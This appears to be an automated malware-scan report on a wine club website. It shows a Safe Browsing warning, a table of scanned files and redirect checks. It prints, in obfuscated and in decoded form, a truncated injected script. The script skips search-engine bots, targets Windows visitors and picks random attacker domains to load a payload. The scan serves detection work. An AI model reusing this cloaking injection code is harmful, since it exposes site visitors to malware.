Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lafayettewineclub.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://lafayettewineclub.com/ | 200 OK Content-Length: 10586 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://lafayettewineclub.com/al/javascript/menudrop.js | 404 Not Found Content-Length: 298 Content-Type: text/html | clean |
http://lafayettewineclub.com/test404page.js | 404 Not Found Content-Length: 287 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lafayettewineclub.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Dec 2014 21:53:37 GMT
Pragma: no-cache
Server: Apache/2.2
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: X-Mapping-eihaoojk=B154138902133A8BA929DAFFE1B750F5; path=/
Set-Cookie: PHPSESSID=5dfn18c65m3c5aup4va9j0l670; path=/
GET / HTTP/1.1
Host: lafayettewineclub.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Dec 2014 21:53:37 GMT
Pragma: no-cache
Server: Apache/2.2
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: X-Mapping-eihaoojk=B154138902133A8BA929DAFFE1B750F5; path=/
Set-Cookie: PHPSESSID=5dfn18c65m3c5aup4va9j0l670; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: lafayettewineclub.com
Referer: http://www.google.com/search?q=lafayettewineclub.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lafayettewineclub.com
Referer: http://www.google.com/search?q=lafayettewineclub.com
Result:
The result is similar to the first query. There are no suspicious redirects found.